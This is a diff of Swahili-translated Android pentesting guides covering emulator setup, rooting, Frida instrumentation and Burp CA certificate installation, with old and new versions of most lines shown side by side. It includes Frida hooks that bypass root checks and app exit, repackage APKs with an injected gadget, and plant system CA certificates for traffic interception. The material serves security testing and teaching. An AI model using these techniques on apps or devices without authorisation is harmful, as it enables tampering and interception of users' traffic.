Mara image inapopakuliwa, chagua tu **`Next`** na **`Finish`**.
Hivyo, chagua na ikiwa haijapakuliwa bonyeza alama ya _**Download**_ kando ya jina (**now wait until the image is downloaded).**\
Mara image itakapopakuliwa, chagua **`Next`** na **`Finish`**.
Mashine pepe itaundwa. Sasa **kila mara unapoingia AVD Manager itakuwa pale**.
Mashine ya virtual itaumbwa. Sasa **kila wakati utakapoingia AVD manager itakuwa present**.
### Endesha Virtual Machine
### Endesha Mashine ya Virtual
Ili **kuendesha** bonyeza tu _**Start button**_.
Ili ku**endesha** bonyeza tu _**Start button**_.
![](<../../images/image (518).png>)
## Zana ya Command Line
> [!WARNING]
> Kwa macOS unaweza kupata chombo `avdmanager` katika `/Users/<username>/Library/Android/sdk/tools/bin/avdmanager` na `emulator` katika `/Users/<username>/Library/Android/sdk/emulator/emulator` ikiwa umeziweka.
> Kwa macOS unaweza kupata zana ya `avdmanager` katika `/Users/<username>/Library/Android/sdk/tools/bin/avdmanager` na `emulator` katika `/Users/<username>/Library/Android/sdk/emulator/emulator` kama zimewekwa.
Kwanza kabisa unahitaji **kuamua ni simu gani unayotaka kutumia**, ili kuona orodha ya simu zinazowezekana endesha:
```
@ -95,7 +95,7 @@ Name: Nexus 10
OEM : Google
[...]
```
Mara tu unapochagua jina la kifaa unayotaka kutumia, unahitaji **kuamua ni Android image gani unayotaka kuendesha kwenye kifaa hiki.**\
Mara tu umeamua jina la kifaa unalotaka kutumia, unahitaji **kuamua ni Android image gani unayotaka kuendesha kwenye kifaa hiki.**\
Unaweza kuorodhesha chaguzi zote ukitumia `sdkmanager`:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list
@ -104,7 +104,7 @@ Na **pakua** ile (au zote) unayotaka kutumia na:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat "platforms;android-28" "system-images;android-28;google_apis;x86_64"
```
Mara baada ya kupakua image ya Android unayotaka kutumia, unaweza **kuorodhesha picha zote za Android ulizopakua** kwa:
Mara baada ya kupakua image ya Android unayotaka kutumia, unaweza **kuorodhesha picha zote za Android zilizopakuliwa** kwa:
```
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list target
----------
@ -120,11 +120,11 @@ Type: Platform
API level: 29
Revision: 4
```
Kwa wakati huu umeamua kifaa unachotaka kutumia na umepakua picha ya Android, hivyo **unaweza kuunda mashine pepe ukitumia**:
Wakati huu umeamua kifaa unachotaka kutumia na umepakua imaji ya Android, hivyo **unaweza kuunda mashine pepe kwa kutumia**:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat -v create avd -k "system-images;android-28;google_apis;x86_64" -n "AVD9" -d "Nexus 5X"
```
Katika amri iliyopita **nilitengeneza VM iliyoitwa** "_AVD9_" kwa kutumia **kifaa** "_Nexus 5X_" na **Android image** "_system-images;android-28;google_apis;x86_64_".\
Katika amri ya mwisho **nilitengeneza VM iliyoitwa** "_AVD9_" kwa kutumia **kifaa** "_Nexus 5X_" na **Android image** "_system-images;android-28;google_apis;x86_64_".\
Sasa unaweza **kuorodhesha virtual machines** ulizozitengeneza kwa:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list avd
@ -140,55 +140,55 @@ Name: Pixel_2_API_27
Path: C:\Users\cpolo\.android\avd\Pixel_2_API_27_1.avd
Error: Google pixel_2 no longer exists as a device
```
### Endesha Virtual Machine
### Endesha Mashine ya Virtual
> [!WARNING]
> Kwa macOS unaweza kupata zana `avdmanager` katika `/Users/<username>/Library/Android/sdk/tools/bin/avdmanager` na `emulator` katika `/Users/<username>/Library/Android/sdk/emulator/emulator` ikiwa umeisakinisha.
> Kwa macOS unaweza kupata zana ya `avdmanager` katika `/Users/<username>/Library/Android/sdk/tools/bin/avdmanager` na `emulator` katika `/Users/<username>/Library/Android/sdk/emulator/emulator` ikiwa zimewekwa.
Tayari tumeona jinsi unavyoweza kuorodhesha virtual machines zilizoundwa, lakini **pia unaweza kuorodhesha kwa kutumia**:
Tayari tumeona jinsi unavyoweza kuorodhesha mashine za virtual ulizozitengeneza, lakini **unaweza pia kuorodhesha kwa kutumia**:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -list-avds
AVD9
Pixel_2_API_27
```
Unaweza kwa urahisi **kuendesha virtual machine yoyote uliyotengeneza** ukitumia:
Unaweza kwa urahisi **kuendesha mashine pepe yoyote iliyoundwa** ukitumia:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "VirtualMachineName"
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9"
```
Au kwa kutumia chaguo zilizoendelea zaidi unaweza kuendesha mashine pepe kama:
Au kwa kutumia chaguo za juu zaidi, unaweza kuendesha virtual machine kama:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -http-proxy 192.168.1.12:8080 -writable-system
```
### Chaguzi za mstari wa amri
### Chaguo za mstari wa amri
Hata hivyo kuna **chaguzi nyingi tofauti za mstari wa amri zinazofaa** ambazo unaweza kutumia kuanzisha mashine pepe. Hapa chini unaweza kupata baadhi ya chaguzi za kuvutia lakini unaweza [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
Hata hivyo kuna **chaguzi nyingi tofauti za mstari wa amri zinazofaa** ambazo unaweza kutumia kuanzisha mashine pepe. Hapa chini unaweza kupata baadhi ya chaguzi zenye kuvutia lakini unaweza [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
**Uanzishaji**
**Boot**
- `-snapshot name` : Anzisha snapshot ya VM
- `-snapshot-list -snapstorage ~/.android/avd/Nexus_5X_API_23.avd/snapshots-test.img` : Orodhesha snapshots zote zilizorekodiwa
**Mtandao**
**Network**
- `-dns-server 192.0.2.0, 192.0.2.255` : Inaruhusu kuonyesha servers za DNS tofauti zilizotenganishwa kwa koma kwa VM.
- **`-http-proxy 192.168.1.12:8080`** : Inaruhusu kuweka HTTP proxy ya kutumia (inayofaa sana kwa kunasa trafiki kwa kutumia Burp)
- `-dns-server 192.0.2.0, 192.0.2.255` : Inaruhusu kuainisha kwa koma seva za DNS kwa VM.
- **`-http-proxy 192.168.1.12:8080`** : Inaruhusu kuainisha HTTP proxy ya kutumia (muhimu sana kwa kunasa trafiki kwa kutumia Burp)
- If the proxy settings aren't working for some reason, try to configure them internally or using an pplication like "Super Proxy" or "ProxyDroid".
- `-netdelay 200` : Weka uigaji wa ucheleweshaji wa mtandao kwa millisekunde.
- `-netdelay 200` : Weka emulation ya ucheleweshaji wa mtandao kwa millisekunde.
- `-port 5556` : Weka nambari ya port ya TCP inayotumika kwa console na adb.
- `-ports 5556,5559` : Weka ports za TCP zinazotumika kwa console na adb.
- **`-tcpdump /path/dumpfile.cap`** : Inakamata trafiki yote kwenye faili
- `-ports 5556,5559` : Weka port za TCP zinazotumika kwa console na adb.
- **`-tcpdump /path/dumpfile.cap`** : Inakamata trafiki yote katika faili
**Mfumo**
**System**
- `-selinux {disabled|permissive}` : Weka module ya usalama Security-Enhanced Linux katika mode imezimwa au permissive kwenye mfumo wa uendeshaji Linux.
- `-selinux {disabled|permissive}` : Weka moduli ya usalama ya Security-Enhanced Linux kuwa disabled au permissive kwenye mfumo wa uendeshaji wa Linux.
- `-timezone Europe/Paris` : Weka timezone kwa kifaa pepe
- `-screen {touch(default)|multi-touch|o-touch}` : Weka mode ya skrini ya kugusa inayoiga.
- **`-writable-system`** : Tumia chaguo hili kupata image ya mfumo inayoweza kuandikwa wakati wa kikao chako cha emulation. Pia utahitaji kukimbia `adb root; adb remount`. Hili ni muhimu sana kwa kufunga cheti jipya kwenye mfumo.
- `-screen {touch(default)|multi-touch|o-touch}` : Weka mode ya skrini ya kugusa iliyohamirishwa.
- **`-writable-system`** : Tumia chaguo hili ili kuwa na system image inayoweza kuandikwa wakati wa kipindi chako cha emulation. Pia utahitaji kuendesha `adb root; adb remount`. Hili ni muhimu sana kusakinisha cheti jipya kwenye mfumo.
## Usanidi wa CLI ya Linux (SDK/AVD quickstart)
Vifaa rasmi vya CLI vinafanya iwe rahisi kuunda emulators za haraka na zinazoweza kudebugiwa bila Android Studio.
Zana rasmi za CLI zinafanya iwe rahisi kuunda emulators za haraka, zinazoweza kufanyiwa debug bila Android Studio.
```bash
# Directory layout
mkdir -p ~/Android/cmdline-tools/latest
@ -217,11 +217,11 @@ adb root
adb shell whoami # expect: root
```
Vidokezo
- Aina za system image: google_apis (inaweza kudebugiwa, inaruhusu adb root), google_apis_playstore (haiwezi ku-root), aosp/default (nyepesi).
- Aina za build: userdebug mara nyingi huruhusu `adb root` kwenye image zilizo na uwezo wa kudebug. Play Store images ni production builds na huzuia root.
- Kwenye hosts za x86_64, emulation kamili ya ARM64 haitegemelewi kuanzia API 28+. Kwa Android 11+ tumia Google APIs/Play images zinazojumuisha tafsiri ya ARM-to-x86 kwa kila-app ili kuendesha kwa haraka apps nyingi za ARM pekee.
- System image flavors: google_apis (debuggable, inaruhusu `adb root`), google_apis_playstore (not rootable), aosp/default (lightweight).
- Build types: userdebug mara nyingi inaruhusu `adb root` kwenye images zenye debug-capability. Play Store images ni production builds na huzuia root.
- On x86_64 hosts, full-system ARM64 emulation is unsupported from API 28+. For Android 11+ tumia Google APIs/Play images ambazo zinajumuisha per-app ARM-to-x86 translation ili kuendesha apps nyingi za ARM-only kwa haraka.
### Snapshots from CLI
### Snapshots kutoka kwa CLI
```bash
# Save a clean snapshot from the running emulator
adb -s emulator-5554 emu avd snapshot save my_clean_setup
@ -229,39 +229,39 @@ adb -s emulator-5554 emu avd snapshot save my_clean_setup
# Boot from a named snapshot (if it exists)
emulator -avd PixelRootX86 -writable-system -snapshot my_clean_setup
```
## Tafsiri ya binary ya ARM→x86 (Android 11+)
## ARM→x86 binary translation (Android 11+)
Google APIs na Play Store images kwenye Android 11+ zinaweza kutafsiri binaries za app za ARM kwa kila process huku zikihifadhi sehemu nyingine za mfumo kuwa native x86/x86_64. Hii mara nyingi ni ya kutosha kujaribu apps nyingi za ARM-tu kwenye desktop.
Google APIs na Play Store images kwenye Android 11+ zinaweza kutafsiri binaries za app za ARM kwa kila mchakato huku zikihifadhi sehemu nyingine za mfumo kuwa native x86/x86_64. Hii mara nyingi ni ya kutosha kwa kasi kujaribu apps nyingi zinazotegemea ARM tu kwenye desktop.
Kidokezo: Tumia Google APIs x86/x86_64 images wakati wa pentests. Play images ni rahisi lakini zinazuia `adb root`; zitumie tu unapohitaji Play services na ukubali kukosa root.
> Kidokezo: Pendelea Google APIs x86/x86_64 images wakati wa pentests. Play images ni rahisi lakini huzuia `adb root`; zitumie tu unapohitaji Play services kwa mahsusi na ukikubali ukosefu wa root.
## Rooting kifaa cha Play Store
## Rooting a Play Store device
Ikiwa umepakua kifaa chenye Play Store hautaweza kupata root moja kwa moja, na utapata ujumbe huu wa kosa
Ikiwa umepakua kifaa chenye Play Store hutaweza kupata root moja kwa moja, na utapata ujumbe huu wa kosa
```
$ adb root
adbd cannot run as root in production builds
```
Nikitumia [rootAVD](https://github.com/newbit1/rootAVD) pamoja na [Magisk](https://github.com/topjohnwu/Magisk) niliweza ku-root (fuata kwa mfano [**this video**](https://www.youtube.com/watch?v=Wk0ixxmkzAI) **au** [**this one**](https://www.youtube.com/watch?v=qQicUW0svB8)).
Kwa kutumia [rootAVD](https://github.com/newbit1/rootAVD) pamoja na [Magisk](https://github.com/topjohnwu/Magisk) niliweza kui-root (fuata kwa mfano [**video hii**](https://www.youtube.com/watch?v=Wk0ixxmkzAI) **au** [**hii nyingine**](https://www.youtube.com/watch?v=qQicUW0svB8)).
## Install Burp Certificate
## Sakinisha Cheti cha Burp
Angalia ukurasa ufuatao kujifunza jinsi ya kusakinisha cheti maalum cha CA:
Angalia ukurasa ufuatao ili kujifunza jinsi ya kusakinisha cheti maalum cha CA:
{{#ref}}
install-burp-certificate.md
{{#endref}}
## Nice AVD Options
## Chaguzi Nzuri za AVD
### Take a Snapshot
### Chukua Snapshot
Unaweza **kutumia GUI** kuchukua snapshot ya VM wakati wowote:
![](<../../images/image (234).png>)
## References
## Marejeo
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
- [Android Emulator command line](https://developer.android.com/studio/run/emulator-commandline)

78
src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
View File

@ -1,9 +1,9 @@
# Mafunzo ya Frida
# Frida Mafunzo
{{#include ../../../banners/hacktricks-training.md}}
## Ufungaji
## Usakinishaji
Sakinisha **frida tools**:
```bash
@ -11,7 +11,7 @@ pip install frida-tools
pip install frida
```
**Pakua na sakinisha** kwenye Android **frida server** ([Download the latest release](https://github.com/frida/frida/releases)).\
Mstari mmoja wa kuanzisha adb tena kwa root mode, kujiunga nayo, kupakia frida-server, kumpa ruhusa za utekelezaji na kuiendesha kwa background:
Mstari mmoja wa amri ili kuwasha upya adb katika root mode, kuungana nayo, kupakia frida-server, kumpa exec permissions na kuikimbiza kwenye background:
```bash
adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &"
```
@ -22,10 +22,10 @@ frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
```
## Frida server vs. Gadget (root vs. no-root)
Njia mbili za kawaida za ku-instrument programu za Android kwa kutumia Frida:
Njia mbili za kawaida za ku-instrument apps za Android kwa kutumia Frida:
- Frida server (rooted devices): Tuma na endesha daemon asilia inayokuruhusu kuambatisha kwenye mchakato wowote.
- Frida Gadget (no root): Weka Frida kama shared library ndani ya APK na ipakie kiotomatiki ndani ya mchakato lengwa.
- Frida server (rooted devices): Pusha na endesha daemon ya native inayokuwezesha kuungana na mchakato wowote.
- Frida Gadget (no root): Weka Frida kama shared library ndani ya APK na ui-pakie kiotomatiki ndani ya mchakato lengwa.
Frida server (rooted)
```bash
@ -42,9 +42,9 @@ frida -U -n com.example.app
```
Frida Gadget (no-root)
1) Tenganisha APK, ongeza gadget .so na config:
- Weka libfrida-gadget.so ndani ya lib/<abi>/ (kwa mfano, lib/arm64-v8a/)
- Unda assets/frida-gadget.config na mipangilio yako ya upakiaji wa script
1) Fungua APK, ongeza gadget .so na config:
- Weka libfrida-gadget.so ndani ya lib/<abi>/ (e.g., lib/arm64-v8a/)
- Unda assets/frida-gadget.config na mipangilio ya upakiaji ya script yako
Mfano wa frida-gadget.config
```json
@ -53,10 +53,10 @@ Mfano wa frida-gadget.config
"runtime": { "logFile": "/sdcard/frida-gadget.log" }
}
```
2) Taja/pakia gadget ili ianzishwe mapema:
- Rahisi zaidi: Ongeza stub ndogo ya Java kwa System.loadLibrary("frida-gadget") katika Application.onCreate(), au tumia upakiaji wa maktaba za native uliopo tayari.
2) Rejea/pakia gadget ili ianzishwe mapema:
- Rahisi zaidi: Ongeza stub ndogo ya Java kwa System.loadLibrary("frida-gadget") katika Application.onCreate(), au tumia kupakia maktaba ya native iliyopo.
3) Repack na saini APK, kisha sakinisha:
3) Rudisha kifurushi na kusaini APK, kisha sakinisha:
```bash
apktool d app.apk -o app_m
# ... add gadget .so and config ...
@ -64,42 +64,42 @@ apktool b app_m -o app_gadget.apk
uber-apk-signer -a app_gadget.apk -o out_signed
adb install -r out_signed/app_gadget-aligned-debugSigned.apk
```
4) Unganisha kutoka host hadi gadget process:
4) Unganisha kutoka host kwenye mchakato wa gadget:
```bash
frida-ps -Uai
frida -U -n com.example.app
```
Vidokezo
- Gadget inatambuliwa na baadhi ya kinga; tunza majina/paths kwa utulivu na zipakwe mwishoni/kwa masharti ikiwa inahitajika.
- Kwa apps zilizo hardened, pendelea rooted testing na server + late attach, au unganisha na Magisk/Zygisk hiding.
Notes
- Gadget inatambuliwa na baadhi ya hatua za ulinzi; hifadhi names/paths kwa utulivu na ziweke kuchelewa/tu kwa masharti ikiwa inahitajika.
- Kwa hardened apps, pendelea testing ya rooted ikitumia server + late attach, au ichanganye na kujificha kwa Magisk/Zygisk hiding.
## Mafunzo
### [Mafunzo 1](frida-tutorial-1.md)
**From**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**Chanzo**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\
**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Msimbo wa Chanzo**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Fuata [kiungo ili kusoma](frida-tutorial-1.md).**
**Soma kupitia [kiungo](frida-tutorial-1.md).**
### [Tutorial 2](frida-tutorial-2.md)
### [Mafunzo 2](frida-tutorial-2.md)
**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Parts 2, 3 & 4)\
**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**Chanzo**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Sehemu 2, 3 & 4)\
**APKs na msimbo wa chanzo**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**Fuata [kiungo ili kusoma.](frida-tutorial-2.md)**
**Soma kupitia [kiungo](frida-tutorial-2.md).**
### [Tutorial 3](owaspuncrackable-1.md)
### [Mafunzo 3](owaspuncrackable-1.md)
**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**Chanzo**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk)
**Fuata [kiungo ili kusoma](owaspuncrackable-1.md).**
**Soma kupitia [kiungo](owaspuncrackable-1.md).**
**You can find more Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
**Unaweza kupata skripti zaidi za Awesome Frida hapa:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
## Quick Examples
## Mifano ya Haraka
### Kuitisha Frida kutoka command line
```bash
@ -125,9 +125,9 @@ print('[ * ] Running Frida Demo application')
script.load()
sys.stdin.read()
```
### Hooking functions without parameters
### Hooking functions bila vigezo
Hook the function `a()` ya class `sg.vantagepoint.a.c`
Hook kazi `a()` ya darasa `sg.vantagepoint.a.c`
```javascript
Java.perform(function () {
; rootcheck1.a.overload().implementation = function() {
@ -144,7 +144,7 @@ sysexit.exit.overload("int").implementation = function (var_0) {
send("java.lang.System.exit(I)V // We avoid exiting the application :)")
}
```
Hook MainActivity `.onStart()` na `.onCreate()`
Hook MainActivity `.onStart()` & `.onCreate()`
```javascript
var mainactivity = Java.use("sg.vantagepoint.uncrackable1.MainActivity")
mainactivity.onStart.overload().implementation = function () {
@ -168,9 +168,9 @@ send("Activity HIT!!!")
var ret = this.onCreate.overload("android.os.Bundle").call(this, var_0)
}
```
### Hooking functions na vigezo na kupata thamani
### Hooking functions zenye parameters na kupata thamani
Hooking function ya decryption. Chapisha ingizo, ita function ya asili ili ku-decrypt ingizo na hatimaye, chapisha data ya wazi:
Hooking decryption function. Chapisha input, itisha original function ili decrypt input, na hatimaye chapisha data wazi:
```javascript
function getString(data) {
var ret = ""
@ -195,9 +195,9 @@ send("Decrypted flag: " + flag)
return ret //[B
}
```
### Hooking functions na kuwaita na pembejeo zetu
### Hooking functions na kuziita kwa pembejeo zetu
Hook function inayopokea string na uite kwa string tofauti (kutoka [here](https://11x256.github.io/Frida-hooking-android-part-2/))
Hook function inayopokea string na uiite na string nyingine (kutoka [here](https://11x256.github.io/Frida-hooking-android-part-2/))
```javascript
var string_class = Java.use("java.lang.String") // get a JS wrapper for java's String class
@ -210,11 +210,11 @@ console.log("Return value: " + ret)
return ret
}
```
### Kupata object iliyoundwa tayari ya darasa
### Getting an already created object of a class
Ikiwa unataka kutoa sifa fulani ya object iliyoundwa unaweza kutumia hii.
Ikiwa unataka kuchota sifa fulani ya object iliyoundwa unaweza kutumia hii.
Katika mfano huu utaona jinsi ya kupata object ya darasa my_activity na jinsi ya kuita function .secret() ambayo itachapisha sifa binafsi ya object:
Katika mfano huu utaona jinsi ya kupata object ya darasa my_activity na jinsi ya kuita function .secret() ambayo itachapisha sifa ya kibinafsi ya object:
```javascript
Java.choose("com.example.a11x256.frida_test.my_activity", {
onMatch: function (instance) {
@ -231,7 +231,7 @@ onComplete: function () {},
- [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
## Marejeleo
## Marejeo
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
- [Frida Gadget documentation](https://frida.re/docs/gadget/)

48
src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
View File

@ -13,16 +13,16 @@ adb shell settings put global http_proxy 192.168.1.2:8080
# Clear proxy
adb shell settings put global http_proxy :0
```
Kidokezo: Katika Burp, elekeza listener yako kwa 0.0.0.0 ili vifaa kwenye LAN viweze kuungana (Proxy -> Options -> Proxy Listeners).
Vidokezo: Katika Burp, weka listener yako kwenye 0.0.0.0 ili vifaa kwenye LAN viweze kuungana (Proxy -> Options -> Proxy Listeners).
## Kwenye Mashine ya Virtuali
## Kwenye Mashine Pepe
Kwanza kabisa unahitaji kupakua cheti la Der kutoka Burp. Unaweza kufanya hivyo katika _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
Kwanza kabisa unahitaji kupakua cheti cha Der kutoka Burp. Unaweza kufanya hivyo katika _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
![](<../../images/image (367).png>)
**Hamisha cheti kwa muundo wa Der** na kisha **tubadilishe** hadi iwe katika fomu ambayo **Android** itaweza **kuelewa.** Kumbuka kwamba **ili kusanidi cheti cha burp kwenye mashine ya Android katika AVD** unahitaji **kuendesha** mashine hii **kwa** chaguo **`-writable-system`**.\
Kwa mfano unaweza kuiendesha hivi:
**Hamisha cheti kwa muundo wa Der** na tu**ibadilishe** kuwa fomu ambayo **Android** itaweza **kuelewa.** Kumbuka kwamba **ili kusanidi cheti cha burp kwenye mashine ya Android katika AVD** unahitaji **kuendesha** mashine hii **kwa** chaguo **`-writable-system`**.\
Kwa mfano unaweza kuiendesha kama:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -http-proxy 192.168.1.12:8080 -writable-system
```
@ -37,27 +37,27 @@ adb shell mv /sdcard/$CERTHASHNAME /system/etc/security/cacerts/ #Move to correc
adb shell chmod 644 /system/etc/security/cacerts/$CERTHASHNAME #Assign privileges
adb reboot #Now, reboot the machine
```
Mara tu **mashine imekamilisha kuanzisha upya**, cheti cha Burp kitakuwa kinatumika na mfumo!
Mara tu **mashine itakapomaliza kuanzisha upya** cheti cha Burp kitakuwa kinatumika!
## Kutumia Magisc
Ikiwa **ulikata root kifaa chako kwa Magisc** (labda emulator), na **huwezi kufuata** **hatua** zilizotangulia kusanidi Burp cert kwa sababu **filesystem ni read-only** na huwezi kuiremonta kuwa writable, kuna njia nyingine.
Ikiwa ume **rooted kifaa chako kwa Magisc** (labda emulator), na **huwezi kufuata** **hatua** zilizotangulia za kusanidua Burp cert kwa sababu **filesystem ni read-only** na huwezi kuiremount ili iwe writable, kuna njia nyingine.
Iliyefafanuliwa katika [**this video**](https://www.youtube.com/watch?v=qQicUW0svB8) unahitaji:
Imeelezewa katika [**video hii**](https://www.youtube.com/watch?v=qQicUW0svB8) unahitaji:
1. **Install a CA certificate**: Just **drag&drop** the DER Burp certificate **changing the extension** to `.crt` in the mobile so it's stored in the Downloads folder and go to `Install a certificate` -> `CA certificate`
1. **Install a CA certificate**: Ingiza tu kwa **drag&drop** cheti cha DER cha Burp ukibadilisha extension hadi `.crt` kwenye simu ili kihifadhiwe kwenye folda ya Downloads na uende `Install a certificate` -> `CA certificate`
<figure><img src="../../images/image (53).png" alt="" width="164"><figcaption></figcaption></figure>
- Angalia cheti kilihifadhiwa vizuri kwa kwenda `Trusted credentials` -> `USER`
- Hakikisha kuwa cheti kimehifadhiwa kwa usahihi kwa kwenda `Trusted credentials` -> `USER`
<figure><img src="../../images/image (54).png" alt="" width="334"><figcaption></figcaption></figure>
2. **Make it System trusted**: Download the Magisc module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (a .zip file), **drag&drop it** in the phone, go to the **Magics app** in the phone to the **`Modules`** section, click on **`Install from storage`**, select the `.zip` module and once installed **reboot** the phone:
2. **Make it System trusted**: Pakua module ya Magisc [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (ni faili .zip), **drag&drop** kwenye simu, nenda kwenye app ya **Magics** kwenye simu kwa sehemu ya **`Modules`**, bonyeza **`Install from storage`**, chagua module ya `.zip` na mara imewekwa **reboot** simu:
<figure><img src="../../images/image (55).png" alt="" width="345"><figcaption></figcaption></figure>
- Baada ya kuanzisha upya, nenda `Trusted credentials` -> `SYSTEM` na uhakikishe Postswigger cert iko hapo
- Baada ya ku-reboot, nenda `Trusted credentials` -> `SYSTEM` na hakikisha cheti cha Postswigger kipo hapo
<figure><img src="../../images/image (56).png" alt="" width="314"><figcaption></figcaption></figure>
@ -67,13 +67,13 @@ Angalia [https://medium.com/@justmobilesec/magisk-for-mobile-pentesting-rooting-
## Baada ya Android 14
Katika toleo la hivi karibuni la Android 14, kumetokea mabadiliko makubwa katika jinsi Certificate Authority (CA) certificates zinazothibitishwa na mfumo zinavyoshughulikiwa. Hapo awali, cheti hizi zilihifadhiwa katika **`/system/etc/security/cacerts/`**, zikipatikana na zinabadilika kwa watumiaji wenye root, na hivyo kutumika mara moja kote kwenye mfumo. Hata hivyo, na Android 14, eneo la uhifadhi limehamishwa kwenda **`/apex/com.android.conscrypt/cacerts`**, saraka ndani ya `\`/apex\``, ambayo ni immutable kwa asili.
Katika toleo jipya la Android 14, kumetokea mabadiliko makubwa katika jinsi Certificate Authority (CA) certificates zinazoaminika na mfumo zinavyoshughulikiwa. Hadi sasa, vyote vilihifadhiwa katika **`/system/etc/security/cacerts/`**, ambavyo vilikuwa vinapatikana na kuweza kubadilishwa na watumiaji walio na root privileges, jambo ambalo liliwezesha mabadiliko kutumika mara moja kwenye mfumo mzima. Hata hivyo, kwa Android 14, mahali pa kuhifadhi yamehamishwa hadi **`/apex/com.android.conscrypt/cacerts`**, saraka ndani ya **`/apex`**, ambayo kwa asili ni immutable.
Jaribio la kuremonta APEX cacerts path kuwa writable yatashindwa, kwani mfumo hautaruhusu operesheni hizo. Hata jaribio la kuunmount au ku-overlay saraka kwa tmpfs halitachukua muda; programu zitabaki kutumia data za cheti asilia licha ya mabadiliko kwenye ngazi ya filesystem. Ustahimilivu huu unatokana na mount ya **`/apex`** kuwa na PRIVATE propagation, kuhakikisha kwamba mabadiliko ndani ya saraka ya **`/apex`** hayagusi michakato mingine.
Jaribio la ku-remount APEX cacerts path ili liwe writable hutumbukia kushindwa, kwa sababu mfumo haukuruhusu operesheni kama hiyo. Hata jaribio la ku-unmount au ku-overlay saraka hiyo kwa filesystem ya muda (tmpfs) halitatenga hali ya immutable; applications zinaendelea kufikia data ya cheti ya awali bila kujali mabadiliko kwenye ngazi ya filesystem. Ustahimilivu huu unatokana na mount ya **`/apex`** kuwa imesanifiwa na PRIVATE propagation, ikihakikisha kwamba mabadiliko yoyote ndani ya saraka ya **`/apex`** hayathiri michakato mingine.
Uanzishaji wa Android unahusisha mchakato wa `init`, ambao, anapoanza mfumo wa uendeshaji, pia huanzisha mchakato wa Zygote. Mchakato huu unawajibika kuwasha michakato ya programu ndani ya mount namespace mpya inayojumuisha mount ya kibinafsi ya **`/apex`**, hivyo kutenganisha mabadiliko ya saraka hii kutoka kwa michakato mingine.
Uanzishaji wa Android unahusisha mchakato wa `init`, ambao, anapoanzisha operating system, pia huanzisha mchakato wa Zygote. Mchakato huu unawajibika kwa kuzindua michakato ya application yenye mount namespace mpya inayojumuisha mount ya kibinafsi ya **`/apex`**, hivyo kutenga mabadiliko ya saraka hii kutoka kwa michakato mingine.
Hata hivyo, kuna njia mbadala kwa wale wanaohitaji kubadilisha CA certificates zinazothibitishwa na mfumo ndani ya saraka ya **`/apex`**. Hii inahusisha kuremonta kwa mkono **`/apex`** ili kuondoa PRIVATE propagation, hivyo kuifanya iwe writable. Mchakato unajumuisha kunakili yaliyomo ya **`/apex/com.android.conscrypt`** mahali pengine, kuunmount saraka ya **`/apex/com.android.conscrypt`** ili kuondoa ukandamizaji wa read-only, na kisha kurejesha yaliyomo kwenye eneo lao la asili ndani ya **`/apex`**. Njia hii inahitaji hatua ya haraka ili kuepuka kukatika kwa mfumo. Ili kuhakikisha mabadiliko haya yanatumika kwenye mfumo mzima, inapendekezwa kuanzisha upya `system_server`, ambayo kwa ufanisi inaanzisha tena programu zote na kuleta mfumo katika hali thabiti.
